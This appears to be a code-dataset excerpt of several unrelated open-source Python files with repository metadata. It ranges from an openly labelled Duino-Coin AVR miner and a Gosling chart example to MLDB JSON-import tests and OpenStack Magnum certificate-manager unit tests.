shares[0] += 1
shares[2] += 1
printlock.acquire()
share_print(port_num(com), "block",
shares[0], shares[1], hashrate,
computetime, diff, ping)
printlock.release()
elif feedback[0] == 'BAD':
shares[1] += 1
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping, feedback[1])
printlock.release()
else:
printlock.acquire()
share_print(port_num(com), "reject",
shares[0], shares[1], hashrate,
computetime, diff, ping, feedback)
printlock.release()
title(get_string('duco_avr_miner') + str(Settings.VER)
+ f') - {shares[0]}/{(shares[0] + shares[1])}'
+ get_string('accepted_shares'))
end_time = time()
elapsed_time = end_time - start_time
if threadid == 0 and elapsed_time >= Settings.REPORT_TIME:
report_shares = shares[0] - last_report_share
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time, end_time, report_shares,
shares[2], hashrate, uptime)
start_time = time()
last_report_share = shares[0]
def periodic_report(start_time, end_time, shares,
block, hashrate, uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" " + get_string('periodic_mining_report')
+ Fore.RESET + Style.NORMAL
+ get_string('report_period')
+ str(seconds) + get_string('report_time')
+ get_string('report_body1')
+ str(shares) + get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3')
+ get_string('report_body7') + str(block)
+ get_string('report_body4')
+ str(int(hashrate)) + " H/s" + get_string('report_body5')
+ str(int(hashrate*seconds)) + get_string('report_body6')
+ get_string('total_mining_time') + str(uptime), "success")
def calculate_uptime(start_time):
    uptime = time() - start_time
    if uptime >= 7200:  # 2 hours, plural
        return str(int(uptime // 3600)) + get_string('uptime_hours')
    elif uptime >= 3600:  # 1 hour, not plural
        return str(int(uptime // 3600)) + get_string('uptime_hour')
    elif uptime >= 120:  # 2 minutes, plural
        return str(int(uptime // 60)) + get_string('uptime_minutes')
    elif uptime >= 60:  # 1 minute, not plural
        return str(int(uptime // 60)) + get_string('uptime_minute')
    else:  # less than 1 minute
        return str(round(uptime)) + get_string('uptime_seconds')
if __name__ == '__main__':
init(autoreset=True)
title(f"{get_string('duco_avr_miner')}{str(Settings.VER)})")
if sys.platform == "win32":
os.system('') # Enable VT100 Escape Sequence for WINDOWS 10 Ver. 1607
check_updates()
try:
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0', get_string('load_config_error')
+ Settings.DATA_DIR + get_string('load_config_error_warning')
+ Style.NORMAL + Fore.RESET + f' ({e})', 'error')
debug_output(f'Error reading configfile: {e}')
sleep(10)
_exit(1)
try:
greeting()
debug_output('Greeting displayed')
except Exception as e:
debug_output(f'Error displaying greeting message: {e}')
try:
check_mining_key(config)
except Exception as e:
debug_output(f'Error checking miner key: {e}')
if donation_level > 0:
try:
Donate.load(donation_level)
Donate.start(donation_level)
except Exception as e:
debug_output(f'Error launching donation thread: {e}')
try:
fastest_pool = Client.fetch_pool()
threadid = 0
for port in avrport:
Thread(target=mine_avr,
args=(port, threadid,
fastest_pool, rig_identifier[threadid])).start()
threadid += 1
except Exception as e:
debug_output(f'Error launching AVR thread(s): {e}')
if discord_presence == "y":
try:
init_rich_presence()
except Exception as e:
debug_output(f'Error launching Discord RPC thread: {e}')
|
660e63d257396e6f7515f44b9f7b4c53d4ff7331
|
dcbce7d48685588f12e2909d256b0b608fbf689f
|
/gosling/examples/area_chart.py
|
448af3d3b9f21b99da97be0c52f062b628ef826b
|
[
"MIT"
] |
permissive
|
gosling-lang/gos
|
89b7cf76a81b51bf21f20dbc167d4ce3f494f97d
|
0f22464b91163944b8654127e02fa64b0106dc21
|
refs/heads/main
| 2023-07-22T07:55:54.733935
| 2023-06-28T17:19:50
| 2023-06-28T17:19:50
| 387,874,230
| 155
| 11
|
MIT
| 2023-09-04T16:08:52
| 2021-07-20T18:00:50
|
Python
|
UTF-8
|
Python
| false
| false
| 602
|
py
|
area_chart.py
|
"""
Area Chart
==========
"""
# category: basic marks
import gosling as gos
data = gos.multivec(
url="https://resgen.io/api/v1/tileset_info/?d=UvVPeLHuRDiYA3qwFlm7xQ",
row="sample",
column="position",
value="peak",
categories=["sample 1"],
)
domain = gos.GenomicDomain(chromosome="chr1", interval=[2000500, 3000500])
track = gos.Track(data).mark_area().encode(
x=gos.X("position:G", domain=domain, axis="bottom"),
y="peak:Q",
size=gos.value(2),
).properties(width=725, height=180, layout="linear")
track.view(title="Basic Marks: Area", subtitle="Tutorial Examples")
|
ac52679e28c535eab64c5305d88b0eb283c09d75
|
2dfc2beac0ad497f8fc59201921097a412f0df7f
|
/trunk/research/code-statistic/cs.py
|
187cc4e76703c6b50becd3a59cbd0ce99b8a06d9
|
[
"Apache-2.0",
"LicenseRef-scancode-mulanpsl-2.0-en",
"MIT",
"MulanPSL-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
ossrs/srs
|
cf9442478fedcd32ef2817f8d53f405a6fa2c7d1
|
7138edd318d30b545e73e80500adda771817f8d1
|
refs/heads/develop
| 2023-09-01T03:38:35.057515
| 2023-08-31T01:45:25
| 2023-08-31T01:49:36
| 34,777,562
| 23,557
| 5,046
|
MIT
| 2023-09-09T00:57:42
| 2015-04-29T06:59:32
|
C++
|
UTF-8
|
Python
| false
| false
| 2,888
|
py
|
cs.py
|
#!/usr/bin/python
#
# Copyright (c) 2013-2021 Winlin
#
# SPDX-License-Identifier: MIT
#
#################################################################################
# to stat the code and comments lines
#################################################################################
import sys
def trace(msg):
print msg
pass
def info(msg):
print msg
pass
def verbose(msg):
#print msg
pass
def process(f, code_file):
info("process file success")
(stat_code, stat_block_comments, stat_line_comments) = (0, 0, 0)
is_block_comments = False
is_line_comments = False
for line in f.readlines():
line = line.strip()
if is_block_comments:
if "*/" in line:
verbose("[block][end] %s"%line)
is_block_comments = False
is_line_comments = False
else:
verbose("[block][cont] %s"%line)
stat_block_comments += 1
continue
if line.startswith("/*"):
verbose("[block][start] %s"%line)
is_block_comments = True
is_line_comments = False
stat_block_comments += 1
# inline block comments
if is_block_comments:
if "*/" in line:
verbose("[block][end] %s"%line)
is_block_comments = False
is_line_comments = False
continue
if line.startswith("//"):
verbose("[line] %s"%line)
is_block_comments = False
is_line_comments = True
stat_line_comments += 1
continue
verbose("[code] %s"%line)
is_block_comments = False
is_line_comments = False
stat_code += 1
total = stat_code + stat_block_comments + stat_line_comments
comments = stat_block_comments + stat_line_comments
trace("total:%s code:%s comments:%s block:%s line:%s file:%s"%(total, stat_code, comments, stat_block_comments, stat_line_comments, code_file))
return (0, total, stat_code, comments, stat_block_comments, stat_line_comments, code_file)
def do_stat(code_file):
f = None
try:
f = open(code_file, "r")
info("open file success");
return process(f, code_file)
finally:
if f is not None:
f.close()
info("close file success")
return (-1, 0, 0, 0, 0, 0, None)
code_file = None
if __name__ == "__main__":
if len(sys.argv) <= 1:
print "to stat the code and comments lines"
print "Usage: python %s <code_file>"%(sys.argv[0])
print " code_file: the code(header or source) file to stat"
print "Example:"
print " python %s src/core/srs_core.hpp"%(sys.argv[0])
sys.exit(-1)
code_file = sys.argv[1]
info("stat %s"%(code_file))
do_stat(code_file)
|
67439de99a60c635fcb8809466fcef72f306fb6b
|
6a017c87a1c3e016de5e1704d23d1d2034fab41c
|
/src/coffea/nanoevents/mapping/util.py
|
b8897d47080067e4f8723a3caeb520f318a41ffa
|
[
"BSD-3-Clause"
] |
permissive
|
CoffeaTeam/coffea
|
53997aefbccf583cc901718b5c639a4b4535dbcd
|
a33fc173f3bf2be307bac6517e624fc6ce0c4c3e
|
refs/heads/master
| 2023-08-10T12:36:49.238010
| 2023-08-02T02:57:18
| 2023-08-02T02:57:18
| 159,673,139
| 116
| 100
|
BSD-3-Clause
| 2023-09-12T20:32:08
| 2018-11-29T13:47:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 2,258
|
py
|
util.py
|
import weakref
from collections.abc import Mapping, MutableMapping
from coffea.nanoevents.util import key_to_tuple
class CachedMapping(Mapping):
"""A cache-wrapped mapping
Reads will call into ``cache`` first, and if no key exists,
    the read will fall back to ``base``, saving the result into ``cache``.
"""
def __init__(self, cache, base):
self.cache = cache
self.base = base
self.stats = {"hit": 0, "miss": 0}
def __getitem__(self, key):
try:
value = self.cache[key]
self.stats["hit"] += 1
return value
except KeyError:
value = self.base[key]
self.cache[key] = value
self.stats["miss"] += 1
return value
def __iter__(self):
return iter(self.base)
def __len__(self):
return len(self.base)
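# A hedged usage sketch (not part of the original module): wrap a plain dict
# "base" store with an empty dict cache; the first read misses and fills the
# cache, the second read is served from it.
def _cached_mapping_example():
    cached = CachedMapping(cache={}, base={"pt": [1, 2, 3]})
    cached["pt"]   # miss: read from base, stored in cache
    cached["pt"]   # hit: served from cache
    assert cached.stats == {"hit": 1, "miss": 1}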
class ArrayLifecycleMapping(MutableMapping):
"""A tool to monitor the lifetime of arrays
Useful for detecting if arrays are getting properly cleaned up
by garbage collection. To be used with NanoEventsFactory as a "fake"
``persistent_cache``
Example::
from coffea.nanoevents import NanoEventsFactory
from coffea.nanoevents.mapping import ArrayLifecycleMapping
array_log = ArrayLifecycleMapping()
def run():
events = NanoEventsFactory.from_root(
"file.root",
persistent_cache=array_log,
).events()
# ... access things
run()
# may consider gc.collect() here
print("Accessed:", array_log.accessed)
print("Finalized:", array_log.finalized)
print("Possibly leaking arrays:", set(array_log.accessed) - set(array_log.finalized))
"""
def __init__(self):
self.accessed = []
self.finalized = []
def __getitem__(self, key):
raise KeyError
def __setitem__(self, key, value):
key = key_to_tuple(key)[4]
key = key.split(",")[0]
self.accessed.append(key)
weakref.finalize(value, self.finalized.append, key)
def __delitem__(self, key):
pass
def __iter__(self):
return iter(self.base)
def __len__(self):
return len(self.base)
|
91cfa2a15bc273f8eeed646f37bdf2e31697708c
|
e384f5467d8bcfd70845997bcbd68d950e874a61
|
/example/python/legacy_opengl/glfw_minimal_example_wavefront.py
|
b9bc884ad87a368a9be76c9ef7528e226cea97de
|
[] |
no_license
|
Rabbid76/graphics-snippets
|
ee642f1ed9ceafc6d320e467d3a084d2446d22c2
|
fa187afeabb9630bc1d988304fb5787e95a91385
|
refs/heads/master
| 2023-08-04T04:32:06.884318
| 2023-07-21T09:15:43
| 2023-07-21T09:15:43
| 109,126,544
| 177
| 12
| null | 2023-04-11T20:05:52
| 2017-11-01T12:05:56
|
C++
|
UTF-8
|
Python
| false
| false
| 1,936
|
py
|
glfw_minimal_example_wavefront.py
|
from OpenGL.GL import *
from OpenGL.GLU import *
from glfw.GLFW import *
from wavefrontloader import *
import os
os.chdir(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../resource'))
if glfwInit() == GLFW_FALSE:
exit()
glfwWindowHint(GLFW_SAMPLES, 8)
window = glfwCreateWindow(300, 300, "OpenGL Window", None, None)
glfwMakeContextCurrent(window)
#model = WavefrontDisplayList('./model/wavefront/bunny.obj')
model = WavefrontDisplayList('./model/wavefront/buddha.obj')
model_center, model_size = model.center, model.size
glLightfv(GL_LIGHT0, GL_AMBIENT, (0.2, 0.2, 0.2, 1.0))
glLightfv(GL_LIGHT0, GL_DIFFUSE, (0.6, 0.6, 0.6, 1.0))
glLightModeliv(GL_LIGHT_MODEL_TWO_SIDE, 1)
glEnable(GL_LIGHT0)
glEnable(GL_LIGHTING)
glEnable(GL_COLOR_MATERIAL)
glShadeModel(GL_SMOOTH)
start_time_s = glfwGetTime()
while not glfwWindowShouldClose(window):
current_time_s = glfwGetTime()
delta_time_s = current_time_s - start_time_s
vp_size = glfwGetFramebufferSize(window)
glViewport(0, 0, *vp_size)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
glDisable(GL_DEPTH_TEST)
glBegin(GL_QUADS)
glColor3f(0, 0, 0)
glVertex2f(-1, -1)
glVertex2f(1, -1)
glColor3f(0.2, 0.6, 0.4)
glVertex2f(1, 1)
glVertex2f(-1, 1)
glEnd()
glMatrixMode(GL_PROJECTION)
gluPerspective(45, vp_size[0]/vp_size[1], min(model_size)/4, max(model_size)*4)
glMatrixMode(GL_MODELVIEW)
glTranslate(0, 0, -max(model_size)*2)
glLightfv(GL_LIGHT0, GL_POSITION, (0, 0, min(model_size), 0))
glEnable(GL_DEPTH_TEST)
glPushMatrix()
glRotatef(delta_time_s * 360/5, 0, 1, 0)
glTranslatef(-model_center[0], -model_center[1], -model_center[2])
model.render()
glPopMatrix()
glfwSwapBuffers(window)
glfwPollEvents()
glfwTerminate()
exit()
|
f1b92b572f6beb1a06d728439457189d8b13c00c
|
479a9c76b19b84d6cde69305828031cd2531aa56
|
/testing/MLDB-1266-import_json.py
|
2fb4a7ab3bae84af8f1d9557ddad5e03f7e9a725
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mldbai/mldb
|
d36801bd99dd3f82d7557cd0f438b0121f63f22c
|
19bc4bc92a41ee8ad4eab0979dffd9c985d95758
|
refs/heads/master
| 2023-09-03T22:59:11.621839
| 2022-12-30T18:42:24
| 2022-12-30T18:42:24
| 47,634,692
| 701
| 107
|
Apache-2.0
| 2023-02-10T23:08:05
| 2015-12-08T16:34:16
|
C++
|
UTF-8
|
Python
| false
| false
| 12,847
|
py
|
MLDB-1266-import_json.py
|
#
# MLDB-1266-import_json.py
# 2016
# This file is part of MLDB. Copyright 2016 mldb.ai inc. All rights reserved.
#
from functools import partial
if False:
mldb_wrapper = None
from mldb import mldb, MldbUnitTest, ResponseException
class ImportJsonTest(MldbUnitTest): # noqa
def assert_val(self, res, rowName, colName, value):
for row in res:
if str(row["rowName"]) != rowName:
continue
for col in row["columns"]:
if col[0] == colName:
self.assertEqual(col[1], value)
return
# did not find col
mldb.log(res)
mldb.log(rowName)
mldb.log(colName)
mldb.log(value)
assert False
# did not find row
mldb.log(res)
mldb.log(rowName)
mldb.log(colName)
mldb.log(value)
assert False
def do_asserts(self, row_prefix, js_res):
assert_val = partial(self.assert_val, js_res)
assert_val(row_prefix + "1", "colA", 1)
assert_val(row_prefix + "1", "colB", "pwet pwet")
assert_val(row_prefix + "2", "colB", "pwet pwet 2")
assert_val(row_prefix + "3", "colC.a", 1)
assert_val(row_prefix + "3", "colC.b", 2)
assert_val(row_prefix + "4", "colD.0", "{\"a\":1}")
assert_val(row_prefix + "4", "colD.1", "{\"b\":2}")
assert_val(row_prefix + "5", "colD.1", 1)
assert_val(row_prefix + "5", "colD.abc", 1)
def test_import_json_procedure(self):
conf = {
"id": "json_importer",
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
"id": "my_json_dataset",
"type": "sparse.mutable"
},
'arrays' : 'encode'
}
}
mldb.put("/v1/procedures/json_importer", conf)
res = mldb.get("/v1/query",
q="select * from my_json_dataset order by rowName()")
self.do_asserts("", res.json())
def test_import_invalid_json(self):
conf = {
"id": "json_importer",
"type": "import.json",
"params": {
"dataFileUrl":
"file://mldb/testing/dataset/json_dataset_invalid.json",
"outputDataset": {
"id": "my_json_dataset",
"type": "sparse.mutable"
},
"runOnCreation": True
}
}
with self.assertRaises(ResponseException):
mldb.put("/v1/procedures/json_importer", conf)
def test_ignore_bad_lines(self):
conf = {
"id": "json_importer",
"type": "import.json",
"params": {
"dataFileUrl":
"file://mldb/testing/dataset/json_dataset_invalid.json",
"outputDataset": {
"id": "my_json_dataset2",
"type": "sparse.mutable"
},
"runOnCreation": True,
"ignoreBadLines": True
}
}
mldb.put("/v1/procedures/json_importer", conf)
res = mldb.get("/v1/query",
q="select * from my_json_dataset2 order by rowName()")
js_res = res.json()
self.assert_val(js_res, "1", "colA", 1)
self.assert_val(js_res, "3", "colB", "pwet pwet 2")
def test_json_builtin_function(self):
csv_conf = {
"type": "import.text",
"params": {
'dataFileUrl' : 'file://mldb/testing/dataset/json_dataset.json',
"outputDataset": {
"id": "imported_json",
},
"quoteChar": "",
"delimiter": "",
"runOnCreation" : True,
}
}
mldb.put("/v1/procedures/csv_proc", csv_conf)
res = mldb.get(
"/v1/query",
q="select parse_json(lineText, {arrays: 'encode'}) as * from imported_json")
self.do_asserts("", res.json())
def test_mldb_1729_output_dataset_string_def(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": "my_json_dataset_1",
'arrays' : 'encode'
}
})
res = mldb.get("/v1/query",
q="SELECT * FROM my_json_dataset_1 ORDER BY rowName()")
self.do_asserts("", res.json())
def test_mldb_1729_output_dataset_string_def_params(self):
"""
Make sure the defaults don't overwrite the given config.
"""
conf = {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "my_json_dataset_2",
'params' : {
'unknownColumns' : 'error'
}
},
"runOnCreation": True
}
}
with self.assertRaises(ResponseException):
mldb.post("/v1/procedures", conf)
def test_where_filtering(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering",
},
"runOnCreation": True,
'where' : 'colA IN (1, 2)'
}
})
res = mldb.query("SELECT * FROM test_where_filtering")
self.assertTableResultEquals(res, [
['_rowName', 'colA', 'colB'],
['1', 1, 'pwet pwet'],
['2', 2, 'pwet pwet 2']
])
def test_select(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering",
},
"runOnCreation": True,
'select' : 'colA'
}
})
res = mldb.query("SELECT * FROM test_where_filtering")
self.assertTableResultEquals(res, [
['_rowName', 'colA'],
['1', 1],
['2', 2],
['3', 3],
['4', None],
['5', None],
['6', None]
])
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering_2",
},
"runOnCreation": True,
'select' : '* EXCLUDING (colA)'
}
})
res = mldb.query("""SELECT * FROM test_where_filtering_2
WHERE rowName()='1'
""")
self.assertTableResultEquals(res, [
['_rowName', 'colB'],
['1', 'pwet pwet']
])
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering_3",
},
"runOnCreation": True,
'select' : 'colA AS wololo'
}
})
res = mldb.query("""SELECT * FROM test_where_filtering_3
WHERE rowName()='1'
""")
self.assertTableResultEquals(res, [
['_rowName', 'wololo'],
['1', 1]
])
def test_named_base(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_named",
},
"runOnCreation": True,
'named' : 'colB',
'where' : 'colB IS NOT NULL'
}
})
res = mldb.query("""SELECT colB FROM test_named""")
self.assertTableResultEquals(res, [
['_rowName', 'colB'],
['pwet pwet', 'pwet pwet'],
['pwet pwet 2', 'pwet pwet 2'],
['pwet pwet 3', 'pwet pwet 3']
])
def test_named_on_object(self):
msg = 'Cannot convert value of type'
with self.assertRaisesRegex(ResponseException, msg):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_where_filtering_2",
},
"runOnCreation": True,
'named' : 'colC',
'where' : 'colC IS NOT NULL'
}
})
def test_named_line_number_fct(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": {
'id' : "test_named_line_number_fct",
},
"runOnCreation": True,
'named' : 'lineNumber() - 1',
}
})
res = mldb.query("SELECT colA FROM test_named_line_number_fct")
self.assertTableResultEquals(res, [
['_rowName', 'colA'],
["0", 1],
["1", 2],
["2", 3],
["3", None],
["4", None],
["5", None]
])
def test_no_input_file(self):
msg = "dataFileUrl is a required property and must not be empty";
with self.assertRaisesRegex(ResponseException, msg):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"outputDataset": {
'id' : "test_no_input_file",
},
"runOnCreation": True,
'named' : 'lineNumber() - 1',
}
})
with self.assertRaisesRegex(ResponseException, msg):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
'dataFileUrl' : '',
"outputDataset": {
'id' : "test_no_input_file",
},
"runOnCreation": True,
'named' : 'lineNumber() - 1',
}
})
with self.assertRaises(ResponseException):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
'dataFileUrl' : 'file:///idonotexist',
"outputDataset": {
'id' : "test_no_input_file",
},
"runOnCreation": True,
'named' : 'lineNumber() - 1',
}
})
def test_arrays_parse(self):
mldb.post("/v1/procedures", {
"type": "import.json",
"params": {
"dataFileUrl": "file://mldb/testing/dataset/json_dataset.json",
"outputDataset": "test_arrays_parse_ds",
'arrays' : 'parse'
}
})
res = mldb.query(
"SELECT * FROM test_arrays_parse_ds ORDER BY rowName()")
self.assertTableResultEquals(res, [
["_rowName", "colA", "colB", "colC.a", "colC.b", "colD.0.a",
"colD.1.b", "colD.0", "colD.1", "colD.2", "colD.3", "colD.4",
"colD.5", "colC.a.b"],
["1", 1, "pwet pwet", None, None, None, None, None, None, None, None, None, None, None],
["2", 2, "pwet pwet 2", None, None, None, None, None, None, None, None, None, None, None],
["3", 3, "pwet pwet 3", 1, 2, None, None, None, None, None, None, None, None, None],
["4", None, None, None, None, 1, 2, None, None, None, None, None, None, None],
["5", None, None, None, None, None, None, 1, 2, 3, 0, 5.25, "abc", None],
["6", None, None, None, None, None, None, None, None, None, None, None, None, 2]
])
if __name__ == '__main__':
mldb.run_tests()
|
6a61a289a7d9497e339a3f1dc281a366b43fb859
|
fb8d962a803ae1f6c20f80b458efd5ba17560b06
|
/magnum/tests/unit/conductor/handlers/common/test_cert_manager.py
|
7d29cedad3de1c23105d95dbab334179029d2cea
|
[
"Apache-2.0"
] |
permissive
|
openstack/magnum
|
980c2151388b8acc60f3ca2818e41431ffa742f4
|
eca79453c0097b0f63019821d3c2e9ecacebf784
|
refs/heads/master
| 2023-08-20T01:44:51.957778
| 2023-07-21T02:54:23
| 2023-07-25T09:00:40
| 26,314,357
| 345
| 282
|
Apache-2.0
| 2022-11-03T11:36:24
| 2014-11-07T10:08:50
|
Python
|
UTF-8
|
Python
| false
| false
| 23,605
|
py
|
test_cert_manager.py
|
# Copyright 2015 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from magnum.common import exception
from magnum.conductor.handlers.common import cert_manager
from magnum.tests import base
from oslo_config import cfg
import magnum.conf
import os
import stat
import tempfile
CONF = magnum.conf.CONF
class CertManagerTestCase(base.BaseTestCase):
def setUp(self):
super(CertManagerTestCase, self).setUp()
cert_manager_patcher = mock.patch.object(cert_manager, 'cert_manager')
self.cert_manager = cert_manager_patcher.start()
self.addCleanup(cert_manager_patcher.stop)
self.cert_manager_backend = mock.MagicMock()
self.cert_manager.get_backend.return_value = self.cert_manager_backend
self.cert_manager_backend.CertManager = mock.MagicMock()
self.CertManager = self.cert_manager_backend.CertManager
@mock.patch('magnum.common.x509.operations.generate_ca_certificate')
@mock.patch('magnum.common.short_id.generate_id')
def test_generate_ca_cert(self, mock_generate_id, mock_generate_ca_cert):
expected_ca_name = 'ca-name'
expected_ca_password = 'password'
expected_ca_cert = {
'private_key': 'private_key', 'certificate': 'certificate'}
expected_ca_cert_ref = 'ca_cert_ref'
mock_generate_id.return_value = expected_ca_password
mock_generate_ca_cert.return_value = expected_ca_cert
self.CertManager.store_cert.return_value = expected_ca_cert_ref
self.assertEqual((expected_ca_cert_ref, expected_ca_cert,
expected_ca_password),
cert_manager._generate_ca_cert(expected_ca_name))
mock_generate_ca_cert.assert_called_once_with(
expected_ca_name, encryption_password=expected_ca_password)
self.CertManager.store_cert.assert_called_once_with(
certificate=expected_ca_cert['certificate'],
private_key=expected_ca_cert['private_key'],
private_key_passphrase=expected_ca_password,
name=expected_ca_name,
context=None
)
@mock.patch('magnum.common.x509.operations.generate_client_certificate')
@mock.patch('magnum.common.short_id.generate_id')
def test_generate_client_cert(self, mock_generate_id, mock_generate_cert):
expected_name = 'admin'
expected_organization_name = 'system:masters'
expected_ca_name = 'ca-name'
expected_password = 'password'
expected_ca_password = 'ca-password'
expected_cert = {
'private_key': 'private_key', 'certificate': 'certificate'}
expected_ca_cert = {
'private_key': 'ca_private_key', 'certificate': 'ca_certificate'}
expected_cert_ref = 'cert_ref'
mock_generate_id.return_value = expected_password
mock_generate_cert.return_value = expected_cert
self.CertManager.store_cert.return_value = expected_cert_ref
self.assertEqual(
expected_cert_ref,
cert_manager._generate_client_cert(
expected_ca_name,
expected_ca_cert,
expected_ca_password))
mock_generate_cert.assert_called_once_with(
expected_ca_name,
expected_name,
expected_organization_name,
expected_ca_cert['private_key'],
encryption_password=expected_password,
ca_key_password=expected_ca_password,
)
self.CertManager.store_cert.assert_called_once_with(
certificate=expected_cert['certificate'],
private_key=expected_cert['private_key'],
private_key_passphrase=expected_password,
name=cert_manager.CONDUCTOR_CLIENT_NAME,
context=None
)
def _test_generate_certificates(self,
expected_ca_name,
mock_cluster,
mock_generate_ca_cert,
mock_generate_client_cert):
expected_ca_password = 'ca-password'
expected_ca_cert = {
'private_key': 'ca_private_key', 'certificate': 'ca_certificate'}
expected_cert_ref = 'cert_ref'
expected_ca_cert_ref = 'ca-cert-ref'
mock_generate_ca_cert.return_value = (expected_ca_cert_ref,
expected_ca_cert,
expected_ca_password)
mock_generate_client_cert.return_value = expected_cert_ref
cert_manager.generate_certificates_to_cluster(mock_cluster)
self.assertEqual(expected_ca_cert_ref, mock_cluster.ca_cert_ref)
self.assertEqual(expected_cert_ref, mock_cluster.magnum_cert_ref)
mock_generate_ca_cert.assert_called_with(expected_ca_name,
context=None)
mock_generate_client_cert.assert_called_once_with(
expected_ca_name, expected_ca_cert, expected_ca_password,
context=None)
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_generate_client_cert')
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_generate_ca_cert')
def test_generate_certificates(self, mock_generate_ca_cert,
mock_generate_client_cert):
expected_ca_name = 'ca-name'
mock_cluster = mock.MagicMock()
mock_cluster.name = expected_ca_name
self._test_generate_certificates(expected_ca_name,
mock_cluster,
mock_generate_ca_cert,
mock_generate_client_cert)
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_generate_client_cert')
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_generate_ca_cert')
def test_generate_certificates_without_name(self, mock_generate_ca_cert,
mock_generate_client_cert):
expected_ca_name = 'ca-uuid'
mock_cluster = mock.MagicMock()
mock_cluster.name = None
mock_cluster.uuid = expected_ca_name
self._test_generate_certificates(expected_ca_name,
mock_cluster,
mock_generate_ca_cert,
mock_generate_client_cert)
@mock.patch('magnum.conductor.handlers.common.cert_manager.'
'_get_issuer_name')
def test_generate_certificates_with_error(self, mock_get_issuer_name):
mock_cluster = mock.MagicMock()
mock_get_issuer_name.side_effect = exception.MagnumException()
self.assertRaises(exception.CertificatesToClusterFailed,
cert_manager.generate_certificates_to_cluster,
mock_cluster)
@mock.patch('magnum.common.x509.operations.sign')
def test_sign_node_certificate(self, mock_x509_sign):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_ca_cert = mock.MagicMock()
mock_ca_cert.get_private_key.return_value = mock.sentinel.priv_key
passphrase = mock.sentinel.passphrase
mock_ca_cert.get_private_key_passphrase.return_value = passphrase
self.CertManager.get_cert.return_value = mock_ca_cert
mock_csr = mock.MagicMock()
mock_x509_sign.return_value = mock.sentinel.signed_cert
cluster_ca_cert = cert_manager.sign_node_certificate(mock_cluster,
mock_csr)
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.ca_cert_ref, resource_ref=mock_cluster.uuid,
context=None)
mock_x509_sign.assert_called_once_with(mock_csr, mock_cluster.name,
mock.sentinel.priv_key,
passphrase)
self.assertEqual(mock.sentinel.signed_cert, cluster_ca_cert)
@mock.patch('magnum.common.x509.operations.sign')
def test_sign_node_certificate_without_cluster_name(self, mock_x509_sign):
mock_cluster = mock.MagicMock()
mock_cluster.name = None
mock_cluster.uuid = "mock_cluster_uuid"
mock_ca_cert = mock.MagicMock()
mock_ca_cert.get_private_key.return_value = mock.sentinel.priv_key
passphrase = mock.sentinel.passphrase
mock_ca_cert.get_private_key_passphrase.return_value = passphrase
self.CertManager.get_cert.return_value = mock_ca_cert
mock_csr = mock.MagicMock()
mock_x509_sign.return_value = mock.sentinel.signed_cert
cluster_ca_cert = cert_manager.sign_node_certificate(mock_cluster,
mock_csr)
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.ca_cert_ref, resource_ref=mock_cluster.uuid,
context=None)
mock_x509_sign.assert_called_once_with(mock_csr, mock_cluster.uuid,
mock.sentinel.priv_key,
passphrase)
self.assertEqual(mock.sentinel.signed_cert, cluster_ca_cert)
def test_get_cluster_ca_certificate(self):
mock_cluster = mock.MagicMock()
mock_cluster.uuid = "mock_cluster_uuid"
mock_ca_cert = mock.MagicMock()
self.CertManager.get_cert.return_value = mock_ca_cert
cluster_ca_cert = cert_manager.get_cluster_ca_certificate(mock_cluster)
self.CertManager.get_cert.assert_called_once_with(
mock_cluster.ca_cert_ref, resource_ref=mock_cluster.uuid,
context=None)
